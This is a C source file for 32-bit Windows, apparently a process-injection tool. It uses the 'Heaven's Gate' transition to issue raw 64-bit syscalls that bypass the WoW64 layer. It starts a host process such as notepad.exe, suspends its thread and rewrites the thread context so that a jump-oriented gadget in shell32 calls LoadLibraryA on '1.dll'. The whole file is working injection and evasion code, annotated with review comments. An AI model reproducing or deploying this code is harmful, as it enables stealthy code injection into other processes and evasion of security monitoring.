#include "hijaxx.h"
#include <stdio.h>
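/*
 * Read the system service number (SSN) out of an ntdll syscall stub.
 *
 * func_name : ANSI export name, e.g. "NtQueryInformationThread".
 *
 * Returns the 16-bit SSN widened to a DWORD, or SSN_NOT_FOUND ((DWORD)-1)
 * when ntdll or the export cannot be resolved, or when the stub does not
 * begin with the expected `mov eax, imm32` (opcode 0xB8). The original
 * version dereferenced a possibly-NULL GetProcAddress result and trusted
 * whatever bytes sat at offset 1.
 *
 * The stub is read from the ntdll that GetModuleHandle resolves in THIS
 * (32-bit) process. Syscall64 then issues that number as a native 64-bit
 * syscall, so the code assumes the immediate matches the 64-bit dispatcher's
 * numbering -- stub layout is not a stable contract; re-verify per target build.
 */
#define SSN_NOT_FOUND ((DWORD)-1)

inline DWORD GetSystemServiceNumber(LPCSTR func_name)
{
    if (func_name == NULL)
        return SSN_NOT_FOUND;

    HMODULE ntdll = GetModuleHandle(L"ntdll");
    if (ntdll == NULL)
        return SSN_NOT_FOUND;

    const BYTE *stub = (const BYTE *)GetProcAddress(ntdll, func_name);
    if (stub == NULL)
        return SSN_NOT_FOUND;

    /* Refuse to pull an immediate out of anything that is not `B8 imm32`;
     * returning garbage here would later be issued as a raw syscall. */
    if (stub[0] != 0xB8)
        return SSN_NOT_FOUND;

    WORD ssn;
    memcpy(&ssn, stub + 1, sizeof ssn); /* unaligned-safe read of the low 16 bits of imm32 */
    return (DWORD)ssn;
}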
// Syscall64 -- issue a native x64 system call from a 32-bit (WoW64) thread.
//
// The 32-bit ntdll stubs in a WoW64 process hand arguments to the WoW64
// layer, which validates/translates them before the kernel sees them. This
// routine bypasses that layer: it far-returns into the 64-bit code segment
// (selector 0x33, the "Heaven's Gate" transition), executes `syscall`
// directly, and far-returns back into the 32-bit segment (selector 0x23).
//
// syscall_number : SSN placed in eax for the kernel dispatcher.
// argc           : number of DWORD varargs that follow.
// ...            : the arguments, each a 32-bit value. The first four go to
//                  r10 (copy of rcx), rdx, r8, r9, zero-extended; any further
//                  ones are pushed on the stack last-to-first.
//
// Returns the kernel's 64-bit rax as a DWORD64 in edx:eax.
//
// Naked function: no compiler prologue/epilogue, caller cleans the varargs.
// Everything between the first and the second `retf` executes in 64-bit
// mode even though it was assembled as 32-bit code -- the EMIT byte strings
// and the `dec eax` trick below depend on that.
__declspec(naked) DWORD64 Syscall64(DWORD syscall_number, DWORD argc, ...)
{
    // Offsets from ebp after the 64-bit `push ebp` (an 8-byte push):
    // [ebp+0] saved rbp, [ebp+8] 4-byte return address from the C caller,
    // [ebp+0xc] syscall_number, [ebp+0x10] argc, [ebp+0x14...] the varargs.
    enum reg { rax_ = 0xc, argc_ = 0x10, rcx_ = 0x14, rdx_ = 0x18, r8_ = 0x1c, r9_ = 0x20, stack_args = 0x24 };
    _asm {
        // Far return to CS=0x33 with EIP = x64 + 5, i.e. the instruction right
        // after `retf` (add = 4 bytes, retf = 1 byte). From here on: long mode.
        push 0x33
        call x64
        x64 :
        add dword ptr[esp], 5
        retf
        push ebp                                  // 64-bit push: 8-byte slot
        mov ebp, esp
        // Arguments beyond the fourth are pushed from index argc-1 down to
        // index 4 so the 5th ends up lowest on the stack; argc <= 4 pushes
        // nothing (for argc < 4 the `jl` exits on the first iteration).
        mov ecx, dword ptr[esp + argc_]
        cmp ecx, 4
        je no_stack_args
        sub ecx, 1
        load_stack_args:
        mov eax, dword ptr[ebp + rcx_ + ecx * 4]
        cmp ecx, 4
        jl no_stack_args
        push eax                                  // pushes rax (8 bytes), zero-extended by the 32-bit mov
        loopnz load_stack_args                    // ZF set by `cmp ecx, 4` ends the loop right after index 4
        no_stack_args :
        // Register arguments; the kernel reads argument 1 from r10, hence the rcx copy.
        mov eax, dword ptr[ebp + rax_]
        mov ecx, dword ptr[ebp + rcx_]
        mov edx, dword ptr[ebp + rdx_]
        EMIT(0X67) EMIT(0X44) EMIT(0X8b) EMIT(0X45) EMIT(0X1c) //mov r8d, dword ptr [ebp + r8_]  (modrm 0x45 = [ebp+disp8]; 0x67 = 32-bit address size)
        EMIT(0x67) EMIT(0X44) EMIT(0X8b) EMIT(0X4d) EMIT(0X20) //mov r9d, dword ptr [ebp + r9_]
        EMIT(0X4c) EMIT(0X8b) EMIT(0Xd1) //mov r10, rcx
        // NOTE(review): the x64 kernel copies stack-passed arguments from
        // [rsp+0x28] in the caller's frame (return-address slot + 0x20 home
        // space of an ordinary `call NtXxx`). No return address is pushed
        // here, so reserving only 0x20 leaves the first pushed argument at
        // [rsp+0x20] -- confirm that calls with 5+ arguments (e.g. the
        // ReturnLength of NtQueryInformationThread in Injex) land where intended.
        sub esp, 20h
        EMIT(0x0F) EMIT(0x05) //syscall
        // `dec eax` assembles to 0x48, which in 64-bit mode is the REX.W prefix
        // of the following instruction. These four lines therefore execute as
        // `mov rdx, rax; shr rdx, 32`, leaving the high half of the 64-bit
        // result in edx for the edx:eax return convention.
        dec eax
        mov edx, eax
        dec eax
        shr edx, 20h
        mov esp, ebp                              // 32-bit move, zero-extends into rsp
        pop ebp                                   // 8-byte pop, matches the push above
        // Switch back: the 64-bit `call` pushes an 8-byte return address.
        // Overwrite its high dword with selector 0x23 and advance the low
        // dword by the 13 bytes of this trampoline (8 + 4 + 1) so the 32-bit
        // `retf` pops EIP:CS and lands on the final `ret` in 32-bit mode.
        call x86
        x86:
        mov dword ptr[esp + 4], 0x23
        add dword ptr[esp], 0xd
        retf
        ret
    };
}
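/*
 * Core scanner: find pattern[0..pattern_len) inside the committed, readable
 * pages of mod, starting at the module base.
 *
 * Fixes over the original loop:
 *  - the scan is bounded to base + SizeOfImage when GetModuleInformation
 *    succeeds (the original fetched MODULEINFO and never used it, so a miss
 *    kept walking whatever was mapped after the module); if the call fails
 *    the walk continues until VirtualQuery does, as before;
 *  - PAGE_GUARD pages are skipped: reading one raises an exception in the
 *    scanning process;
 *  - the per-region bound is `p + pattern_len <= end` instead of
 *    `j < RegionSize - 4`, which underflowed for regions smaller than 4 bytes
 *    and hard-coded the compare length.
 *
 * With is_code set only pages whose protection matches
 * IMAGE_SECTION_EXECUTABLE are examined; that constant is expected from the
 * project header and is assumed to cover the PAGE_EXECUTE* protections.
 *
 * Returns the first match, or NULL (also for NULL inputs or pattern_len == 0).
 */
static LPVOID SearchModuleMemoryN(HMODULE mod, const char *pattern, SIZE_T pattern_len, BOOL is_code)
{
    if (mod == NULL || pattern == NULL || pattern_len == 0)
        return NULL;

    /* Exclusive upper bound of the scan; NULL means "unbounded" (legacy behaviour). */
    const BYTE *scan_end = NULL;
    MODULEINFO mi = { 0 };
    if (GetModuleInformation(GetCurrentProcess(), mod, &mi, sizeof(mi)) && mi.SizeOfImage != 0)
        scan_end = (const BYTE *)mi.lpBaseOfDll + mi.SizeOfImage;

    MEMORY_BASIC_INFORMATION mbi = { 0 };
    const BYTE *region = (const BYTE *)mod;
    while (VirtualQuery(region, &mbi, sizeof(mbi)) == sizeof(mbi)) {
        if (scan_end != NULL && region >= scan_end)
            break;

        BOOL readable = mbi.State == MEM_COMMIT
                     && mbi.Protect != PAGE_NOACCESS
                     && !(mbi.Protect & PAGE_GUARD);
        BOOL wanted = readable && (!is_code || (mbi.Protect & IMAGE_SECTION_EXECUTABLE));

        /* RegionSize is measured from mbi.BaseAddress, not from `region`. */
        const BYTE *region_end = (const BYTE *)mbi.BaseAddress + mbi.RegionSize;
        if (wanted) {
            const BYTE *end = region_end;
            if (scan_end != NULL && end > scan_end)
                end = scan_end;
            for (const BYTE *p = region; p + pattern_len <= end; p++) {
                if (memcmp(p, pattern, pattern_len) == 0)
                    return (LPVOID)p;
            }
        }

        if (region_end <= region) /* address-space wrap guard */
            break;
        region = region_end;
    }
    return NULL;
}

/*
 * Scan a module's committed pages for a short byte pattern.
 *
 * Compatibility wrapper. The original implementation compared
 * sizeof(search_string) bytes -- the size of a POINTER, 4 on the 32-bit
 * build this file targets -- minus one when is_code is set. Every caller in
 * this file relies on exactly that (the first 4 bytes of "1.dll", a 4-byte
 * IAT slot holding &LoadLibraryA, a 3-byte gadget), so the historic length is
 * kept here explicitly; use SearchModuleMemoryN when you know the real length.
 *
 * mod           : module to scan (its base is the scan start).
 * search_string : bytes to match; NOT treated as a C string, no NUL needed.
 * is_code       : TRUE restricts the scan to executable pages and shortens
 *                 the compared pattern to 3 bytes.
 *
 * Returns the first matching address, or NULL.
 */
LPVOID SearchModuleMemory(HMODULE mod, char* search_string, BOOL is_code)
{
    /* sizeof(char*) reproduces the original (accidental) compare length. */
    SIZE_T pattern_len = sizeof(search_string) - (is_code ? 1 : 0);
    return SearchModuleMemoryN(mod, search_string, pattern_len, is_code);
}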
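/*
 * Redirect a suspended 32-bit thread in another process to a JOP gadget in
 * shell32 that performs LoadLibraryA("1.dll").
 *
 * thread : a suspended thread handle of the (WoW64) target process.
 *
 * Steps:
 *  1. read the thread's WOW64 context with a raw NtQueryInformationThread
 *     (THREAD_WOW_CONTEXT) through Syscall64;
 *  2. locate, in OUR address space, (a) the bytes "1.dl" inside kernel32
 *     (SearchModuleMemory compares 4 bytes), (b) a `push ecx; call [edx]`
 *     gadget (51 FF 12) in an executable page of shell32, (c) a 4-byte slot in
 *     shell32 holding the address of LoadLibraryA (an IAT entry);
 *  3. set Ecx/Edx/Eip so the gadget pushes the string and calls LoadLibraryA
 *     through that slot, and write the context back with
 *     NtSetInformationThread.
 *
 * Assumed, not checked: kernel32 and shell32 are mapped at the same base in
 * the target as in this process, and the target is a 32-bit image so the
 * context read here is a WOW64 context. Nothing after the gadget's `call`
 * returns the thread to a sane state.
 *
 * Returns TRUE if the new context was written successfully. On any failure
 * the thread's context is left untouched (the original code would have set
 * Eip to NULL when a gadget lookup failed).
 */
static BOOL HijackWow64Thread(HANDLE thread)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;
    DWORD len = 0;

    DWORD64 ret = Syscall64(
        GetSystemServiceNumber("NtQueryInformationThread"),
        5,
        (DWORD)thread,
        THREAD_WOW_CONTEXT,
        &ctx,
        sizeof(ctx),
        &len);
    if ((LONG)(DWORD)ret < 0) /* NTSTATUS is in the low 32 bits of rax */
        return FALSE;

    HMODULE kernel32 = GetModuleHandle(L"kernel32.dll");
    HMODULE shell32 = LoadLibrary(L"shell32.dll"); /* loaded into this process so its pages can be scanned */
    if (kernel32 == NULL || shell32 == NULL)
        return FALSE;

    FARPROC _LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA");
    if (_LoadLibraryA == NULL)
        return FALSE;

    LPVOID remote_lib_string = SearchModuleMemory(kernel32, "1.dll", FALSE);
    //"\x51\xFF\x12"
    //push ecx
    //call[edx]
    LPVOID gadget = SearchModuleMemory(shell32, "\x51\xFF\x12", TRUE);
    /* The raw bytes of the function pointer are the pattern: find a slot in
     * shell32 that contains &LoadLibraryA. */
    LPVOID LoadLibraryA_ptr = SearchModuleMemory(shell32, (char*)&_LoadLibraryA, FALSE);
    if (remote_lib_string == NULL || gadget == NULL || LoadLibraryA_ptr == NULL)
        return FALSE;

    ctx.Ecx = (DWORD)remote_lib_string;
    ctx.Edx = (DWORD)LoadLibraryA_ptr;
    ctx.Eip = (DWORD)gadget;
    ret = Syscall64(
        GetSystemServiceNumber("NtSetInformationThread"),
        4,
        (DWORD)thread,
        THREAD_WOW_CONTEXT,
        &ctx,
        sizeof(ctx));
    return (LONG)(DWORD)ret >= 0;
}

/*
 * Injex -- start host_file, suspend its primary thread after a short delay,
 * hijack the thread (see HijackWow64Thread) and let it run again.
 *
 * host_file : full path of the (32-bit) executable to start.
 *
 * Changes from the original: CreateProcessW and SuspendThread results are
 * checked instead of dereferencing NULL handles; si.cb is set as the API
 * requires; the child no longer inherits our handles (it needs none);
 * the process and thread handles are closed on every path; the unused
 * `dll_name` magic constant is gone. The 500 ms Sleep is kept -- it is a
 * race with the child's loader, not synchronization, and a host that has
 * not mapped shell32 yet will simply not be found/hijacked.
 */
VOID Injex(LPWSTR host_file)
{
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof(si);

    if (!CreateProcessW(host_file, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
        return;

    Sleep(500);

    if (SuspendThread(pi.hThread) != (DWORD)-1) {
        /* Result deliberately ignored: the interface is VOID, and on failure
         * the thread resumes with its original context. */
        HijackWow64Thread(pi.hThread);
        ResumeThread(pi.hThread);
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}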
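/*
 * Entry point. With no arguments the host is notepad.exe from System32; an
 * optional first argument names another (32-bit) executable to start.
 *
 * Returns 0 on normal completion, 1 if the argument could not be converted
 * to a wide path (conversion failure or longer than MAX_PATH-1 characters).
 */
int main(int argc, char *argv[])
{
    WCHAR host[MAX_PATH];
    LPWSTR host_file = L"c:\\windows\\system32\\notepad.exe";

    if (argc > 1) {
        /* argv[] is in the ANSI code page; length -1 converts the NUL too. */
        int n = MultiByteToWideChar(CP_ACP, 0, argv[1], -1, host, MAX_PATH);
        if (n <= 0) {
            fprintf(stderr, "host path could not be converted or exceeds %d characters\n", MAX_PATH - 1);
            return 1;
        }
        host_file = host;
    }

    Injex(host_file);
    return 0;
}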